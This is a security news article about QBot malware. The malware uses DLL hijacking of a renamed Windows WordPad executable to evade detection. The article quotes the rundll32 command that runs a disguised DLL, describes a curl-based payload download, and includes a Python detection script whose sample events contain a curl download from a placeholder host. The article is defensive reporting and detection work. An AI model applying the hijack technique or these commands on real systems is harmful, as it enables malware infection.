
QBot Malware Abuses Windows WordPad EXE to Infect Devices

Posted on 27 May at 8:02 am

The QBot malware operation has started to abuse a DLL hijacking flaw in the Windows 10 WordPad program to infect computers, using the legitimate program to evade detection by security software.

A DLL is a library file containing functions that can be used by more than one program at the same time. When an application is launched, it will attempt to load any required DLLs.

It does this by searching through specific Windows folders for the DLL and, when found, loads it. However, Windows applications will prioritize DLLs in the same folder as the executable, loading them before all others.

DLL hijacking is when a threat actor creates a malicious DLL of the same name as a legitimate one, and places it in the early Windows search path, usually the same folder as the executable. When that executable is launched, it will load the malware DLL rather than the legitimate one and execute any malicious commands within it.

QBot abuses WordPad DLL hijacking flaw

QBot, also known as Qakbot, is a Windows malware that initially started as a banking trojan but evolved into a malware dropper. Ransomware gangs, including Black Basta, Egregor, and Prolock, have partnered with the malware operation to gain initial access to corporate networks to conduct extortion attacks.

Security researcher and Cryptolaemus member ProxyLife told BleepingComputer that a new QBot phishing campaign began abusing a DLL hijacking vulnerability in the Windows 10 WordPad executable, write.exe.

While BleepingComputer has not seen the original phishing emails, ProxyLife told us they contain a link to download a file.

When a person clicks on the link, a ZIP archive with a random name is downloaded from a remote host.

This ZIP file contains two files: document.exe (the Windows 10 WordPad executable) and a DLL file named edputil.dll (used for the DLL hijack).

Contents of the downloaded ZIP file
Source: BleepingComputer

As you can see from the properties of the document.exe file, it is simply a renamed copy of the legitimate Write.exe executable used to launch the Windows 10 WordPad document editor.

Renamed Windows 10 WordPad executable
Source: BleepingComputer

When document.exe is launched, it automatically attempts to load a legitimate DLL file called edputil.dll, which is normally located in the C:\Windows\System32 folder.

However, when the executable attempts to load edputil.dll, it does not specify a fixed folder to load it from, so it will load any DLL of the same name found in the same folder as the document.exe executable, which is searched before C:\Windows\System32.

This allows the threat actors to perform DLL hijacking by creating a malicious version of the edputil.dll DLL and storing it in the same folder as document.exe so it is loaded instead.

ProxyLife told BleepingComputer that, once the DLL is loaded, the malware uses C:\Windows\system32\curl.exe to download a DLL camouflaged as a PNG file from a remote host.

This PNG file (actually a DLL) is then executed using rundll32.exe with the following command:

rundll32 c:\users\public\default.png,print
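As an added example (not code from the article or from BleepingComputer), the Python below checks Sysmon-style process-creation records for the three observable steps of the chain described above: a renamed Windows binary (document.exe whose original file name is write.exe), curl.exe launched by a process living in a user-writable folder, and rundll32 being handed a module that is not a .dll. The field names and the sample records are constructed assumptions.

```python
import re
from typing import Dict, List

# Signed Windows binaries that appear in the chain (write.exe is renamed to
# document.exe; curl.exe and rundll32.exe are used under their real names).
KNOWN_SYSTEM_BINARIES = {"write.exe", "curl.exe", "rundll32.exe"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "\\temp\\", "\\appdata\\")
# First argument of rundll32: the module path, which ends at the comma before
# the export name (e.g. "rundll32 c:\users\public\default.png,print").
RUNDLL_MODULE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+)', re.IGNORECASE)

def in_windows_dir(path: str) -> bool:
    return path.lower().startswith("c:\\windows\\")

def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)

def analyse(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule a single process-creation event trips."""
    hits = []
    image, parent = event["Image"], event["ParentImage"]
    orig = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    # Rule 1: a Windows binary running outside C:\Windows under a new name.
    if orig in KNOWN_SYSTEM_BINARIES and not in_windows_dir(image):
        hits.append("renamed_system_binary")
    # Rule 2: rundll32 loading a "module" whose extension is not .dll/.cpl.
    if image.lower().endswith("\\rundll32.exe"):
        m = RUNDLL_MODULE.search(cmd)
        module = m.group(1).strip() if m else ""
        if module and not module.lower().endswith((".dll", ".cpl")):
            hits.append("rundll32_non_dll_module")
    # Rule 3: curl.exe spawned by a parent that lives in a user-writable folder.
    if image.lower().endswith("\\curl.exe") and in_user_writable(parent):
        hits.append("curl_spawned_from_user_dir")
    return hits

# Constructed sample telemetry modelled on the article's chain (not real logs).
SAMPLE_EVENTS = [
    {"Image": "C:\\Users\\alice\\Downloads\\doc\\document.exe", "OriginalFileName": "WRITE.EXE",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "document.exe"},
    {"Image": "C:\\Windows\\System32\\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": "C:\\Users\\alice\\Downloads\\doc\\document.exe",
     "CommandLine": "curl.exe -o c:\\users\\public\\default.png http://placeholder.invalid/x"},
    {"Image": "C:\\Windows\\System32\\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "ParentImage": "C:\\Users\\alice\\Downloads\\doc\\document.exe",
     "CommandLine": "rundll32 c:\\users\\public\\default.png,print"},
    {"Image": "C:\\Windows\\System32\\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",  # benign
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "rundll32 shell32.dll,Control_RunDLL"},
    {"Image": "C:\\Windows\\System32\\write.exe", "OriginalFileName": "WRITE.EXE",  # benign
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "write.exe"},
]

def scan(events: List[Dict[str, str]]) -> List[tuple]:
    return [(e["Image"], rule) for e in events for rule in analyse(e)]
```

Each rule fires on one stage of the chain independently, so a single hit is worth a look even when the other stages were not logged.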

QBot will now quietly run in the background, stealing emails for use in further phishing attacks and eventually downloading other payloads, such as Cobalt Strike (a post-exploitation toolkit threat actors use to gain initial access to the infected device).

This device will then be used as a foothold to spread laterally throughout the network, commonly leading to corporate data theft and ransomware attacks.

By installing QBot through a trusted program like the Windows 10 WordPad (write.exe), the threat actors hope security software will not flag the malware as malicious.

However, using curl.exe means that this infection method will only work on Windows 10 and later, as earlier operating system versions do not ship with the curl program.

For the most part, this should not be an issue, as older versions of Windows have been phased out after reaching the end of support.

At this time, the QBot operation has moved on to other infection methods in recent weeks, but it is not uncommon for them to switch to previous tactics in later campaigns.

© 2023 Veiliant Inc. All rights reserved.